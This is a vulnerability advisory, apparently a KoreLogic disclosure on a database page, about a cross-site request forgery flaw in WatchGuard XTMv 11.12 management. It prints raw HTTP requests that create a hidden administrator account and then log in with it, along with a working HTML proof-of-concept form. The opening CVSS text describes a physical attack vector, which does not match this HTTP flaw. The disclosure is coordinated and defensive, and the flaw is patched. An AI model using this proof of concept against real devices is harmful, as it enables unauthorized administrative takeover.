The attack requires the attacker to physically touch or manipulate the vulnerable system. Physical interaction may be brief (e.g., evil maid attack1) or persistent. An example of such an attack is a cold boot attack in which an attacker gains access to disk encryption keys after physically accessing the target system. Other examples include peripheral attacks via FireWire/USB Direct Memory Access (DMA).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
WatchGuard XTMv 11.12 Build 516911 Cross Site Request ForgeryKL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
1. Vulnerability Details
Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP
2. Vulnerability Description
Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.
3. Technical Description
As observed below, no CSRF token is in use when adding a new
user to the management portal.
POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
The HTTP response indicates that the changes were successful.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
Connection: close
{"status": true, "message": ["The changes were saved successfully"]}
Now, the newly created backdoor account can be accessed.
POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
The response below shows the application issuing an authenticated
session cookie.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
4. Mitigation and Remediation Recommendation
The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt